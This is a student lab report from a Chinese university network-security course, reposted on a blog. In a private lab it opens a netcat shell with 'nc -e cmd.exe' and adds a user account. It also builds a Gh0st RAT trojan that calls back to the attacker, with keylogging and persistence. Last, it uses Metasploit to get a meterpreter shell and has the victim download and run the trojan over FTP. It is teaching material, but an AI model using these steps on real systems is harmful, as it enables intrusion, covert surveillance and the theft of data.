实验四 恶意代码技术

实验四 恶意代码技术中国人民公安大学Chinesepeople’ publicsecurityuniversity网络对抗技术实验报告实验四恶意代码技术学生姓名赖伽煜年级2018级区队网安七区指导教师高见信息技术与网络安全学院2020年11月26日实验任务总纲2020—

大家好,欢迎来到IT知识分享网。

中国人民公安大学

Chinese people’ public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

赖伽煜 

年级

2018级 

区队

网安七区 

指导教师

高见 

 

 

信息技术与网络安全学院

20201126


实验任务总纲

2020—2021 学年   学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

三、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

 

任务一 利用NC控制电脑

 

工具: NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

步骤一:

     在受害者的机器 nigacat(192.168.92.130)输入下面的命令:
   nc.exe -l -p 10000 -e cmd.exe   对10000号端口进入监听模式

 实验四 恶意代码技术

步骤二:
  在攻击者的机器.(192.168.92.134)输入下面的命令:
  nc 192.168.92.130  10000 //连接nigacat,然后得到一个shell。

 实验四 恶意代码技术

步骤三:

    在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。

 实验四 恶意代码技术

 继续通过命令行进行一些操作。

1.例如查看nigacat主机的网络配置情况

 实验四 恶意代码技术 

2.与被害主机在10000号端口进行聊天对话

 实验四 恶意代码技术

 

任务二 利用木马控制电脑

步骤一:

    攻击者的机器(192.168.92.135)启动Ghost Rat。

步骤二:
  点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回连IP地址为192.168.92.135,回连端口为2012,并点击“生成”按钮,生成木马server.exe。

步骤三:

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。得到结果如下: 

 实验四 恶意代码技术

步骤四:

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。

  1. 文件管理,尝试拷贝文件

 实验四 恶意代码技术

 

 

  1. 屏幕控制,尝试获取桌面

 实验四 恶意代码技术

 

 

  1. 键盘记录,尝试获取对方击键记录

 实验四 恶意代码技术

 

 

  1. 会话管理,重启对方机器,查看是否能自启动上线

 实验四 恶意代码技术

 

 

  1. 会话管理,卸载对方的木马。

 实验四 恶意代码技术

 

 

任务三木马分析

将任务二中生成的木马设置具备自删除功能和自启动功能,对其进行分析。回答以下问题(截图证明)

1.该木马的回连IP是?(192.168.92.135)

 实验四 恶意代码技术

 

 

2.该木马的回连端口是?(2012)

 实验四 恶意代码技术

 

 

3.该木马自删除后,会将自身的宿主程序改成什么名字,并隐藏到系统其它目录中。

 实验四 恶意代码技术

 

 

 

4.该木马依靠什么方法实现自启动的,怎么实现的?(通过修改注册自启动项目。)

 实验四 恶意代码技术

 

 实验四 恶意代码技术

 

 

 

 任务四 msf攻击体验

1.在主机A上搭建easyfile,安装文件为efssetup。

2.在主机B上安装metasploitframework,并在安装目录中启动/bin下的msfconsole

3.进入msf命令行后使用search命令查找相关模块,use 加载模块,show options 查看参数。

 实验四 恶意代码技术

 

 

 

   4.把远程目标参数rhosts设置为主机A的IP地址,开始攻击。

 实验四 恶意代码技术

 

 

 

5.进入到meterpreter> 命令行下,说明已经获取到shell,可以使用sysinfo查看目标系统的信息,screenshot截屏。

 实验四 恶意代码技术

 

 

 

下面的步骤是进一步控制目标机器,上传木马。 

1.在B机器上搭建ftp,设置用户名和密码。

2.在B机器开启木马控制端,生成木马server.exe,并放置在ftp目录下。

3.在meterpreter>命令行下输入shell ,进入被控机器的shell

4.用被控机器的shell登录B机器的ftp,下载并执行木马。查看木马上线。

涉及到的ftp命令有:
ftp  192.168.31.122  登录

get server3.exe  下载文件

实验四 恶意代码技术

 

 实验四 恶意代码技术

 

免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/33111.html

(0)

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

关注微信